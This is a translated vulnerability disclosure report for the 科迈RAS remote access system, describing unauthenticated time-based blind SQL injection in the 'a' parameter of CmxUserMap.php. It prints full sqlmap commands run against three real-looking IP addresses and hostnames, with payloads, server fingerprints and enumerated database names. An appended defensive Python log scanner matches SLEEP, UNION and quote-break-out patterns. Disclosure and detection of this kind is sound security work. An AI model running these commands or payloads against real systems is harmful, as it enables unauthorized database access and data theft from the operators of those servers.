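2015-07-15: Details reported to the vendor; awaiting vendor handling
2015-07-17: Vendor confirmed; details disclosed to the vendor only
2015-07-20: Details opened to third-party security partners
2015-09-10: Details disclosed to core white hats and experts in related fields
2015-09-20: Details disclosed to regular white hats
2015-09-30: Details disclosed to trainee white hats
2015-10-15: Details disclosed to the public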
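科迈RAS remote fast access system: SQL injection without login
In the 科迈RAS remote fast access system, the standard edition client has a SQL injection vulnerability at the login point. Search keyword: 科迈RAS
There are quite a lot of affected cases; here are a few examples: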
python sqlmap.py -u "http://218.91.204.132:8080/Server/CmxUserMap.php?t=&a=123&b=32&c=undefined&d=" --dbms="mysql"
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[21:11:07] [INFO] testing 'MySQL UNION query (71) - 1 to 20 columns'
[21:11:16] [INFO] checking if the injection point on GET parameter 'a' is a false positive
GET parameter 'a' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 339 HTTP(s) requests:
---
Parameter: a (GET)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: t=&a=123' AND (SELECT * FROM (SELECT(SLEEP(5)))JarV) AND 'aSBL'='aSBL&b=32&c=undefined&d=
---
[21:11:39] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.11
[21:11:39] [INFO] fetched data logged to text files under 'C:\Users\xfkxfk\.sqlmap\output\218.91.204.132'
[*] shutting down at 21:11:39

python sqlmap.py -u "http://61.182.242.18:8080/Server/CmxUserMap.php?t=&a=123&b=32&c=undefined&d=" --dbms="mysql"
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: a (GET)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: t=&a=123' AND (SELECT * FROM (SELECT(SLEEP(5)))zwjn) AND 'NlSP'='NlSP&b=32&c=undefined&d=
---
[21:21:11] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[21:21:27] [INFO] confirming MySQL
[21:21:27] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[21:21:38] [INFO] adjusting time delay to 1 second due to good response times
[21:21:38] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
[21:21:38] [INFO] fetched data logged to text files under 'C:\Users\xfkxfk\.sqlmap\output\61.182.242.18'
[*] shutting down at 21:21:38

python sqlmap.py -u "http://tianyicnc.meibu.com:800/Server/CmxUserMap.php?t=&a=123&b=32&c=undefined&d=" --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: a (GET)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: t=&a=123' AND (SELECT * FROM (SELECT(SLEEP(5)))orFh) AND 'RZuz'='RZuz&b=32&c=undefined&d=
---
[21:22:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.11
[21:22:52] [INFO] fetching database names
[21:22:52] [INFO] fetching number of databases
[21:22:52] [INFO] resumed: 3
[21:22:52] [INFO] resumed: information_schema
[21:22:52] [INFO] resumed: mysql
[21:22:52] [INFO] resumed: rasdatabase
available databases [3]:
[*] information_schema
[*] mysql
[*] rasdatabase
[21:22:52] [INFO] fetched data logged to text files under 'C:\Users\xfkxfk\.sqlmap\output\tianyicnc.meibu.com'
[*] shutting down at 21:22:52
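
For operators of an affected installation, an added example (not part of the original report) that scans web server access logs for injection attempts against the query parameters of /Server/CmxUserMap.php, such as the time-based payload sqlmap reports above for parameter a. The log lines, client addresses, signature labels and the Apache common log format are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (sample data, not taken from any real server).
# Line 2 carries the time-based payload from the sqlmap output, URL-encoded;
# line 3 is a constructed UNION probe; line 4 is a benign value with an apostrophe.
SAMPLE_LOG = """\
192.0.2.10 - - [15/Jul/2015:21:10:58 +0800] "GET /Server/CmxUserMap.php?t=&a=123&b=32&c=undefined&d= HTTP/1.1" 200 512
192.0.2.77 - - [15/Jul/2015:21:11:07 +0800] "GET /Server/CmxUserMap.php?t=&a=123%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29JarV%29%20AND%20%27aSBL%27%3D%27aSBL&b=32&c=undefined&d= HTTP/1.1" 200 512
192.0.2.77 - - [15/Jul/2015:21:11:16 +0800] "GET /Server/CmxUserMap.php?t=&a=123%27%20UNION%20ALL%20SELECT%2071%2C71--%20-&b=32&c=undefined&d= HTTP/1.1" 200 512
192.0.2.10 - - [15/Jul/2015:21:12:01 +0800] "GET /Server/CmxUserMap.php?t=&a=o%27brien&b=32&c=undefined&d= HTTP/1.1" 200 512
"""

# client, timestamp, request target and status from a common-log-format line
REQUEST = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Signature labels are names chosen for this example.
SIGNATURES = {
    "time-based blind": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "union query": re.compile(r"\bunion\b.+\bselect\b", re.I),
    "quote break-out": re.compile(r"'\s*(?:and|or)\b", re.I),
}


def scan(log_text, path_suffix="/Server/CmxUserMap.php"):
    """Return (client, timestamp, parameter, [signature labels]) per suspicious parameter."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # not a parsable request line
        client, ts, target, _status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(path_suffix):
            continue
        # parse_qsl URL-decodes each value, so encoded payloads are matched too
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            hits = [label for label, rx in SIGNATURES.items() if rx.search(value)]
            if hits:
                findings.append((client, ts, name, hits))
    return findings


if __name__ == "__main__":
    for client, ts, param, hits in scan(SAMPLE_LOG):
        print(f"{ts} {client} parameter={param} matched={', '.join(hits)}")
```

Only query strings are inspected; parameters sent in a POST body do not appear in access logs and need request-body logging to cover.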
Some of the affected cases:
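Severity: High
Vulnerability Rank: 11
Confirmation time: 2015-07-17 16:55
CNVD has confirmed the vulnerability as described. No direct handling channel with the software vendor has been established yet; awaiting claim.
None yet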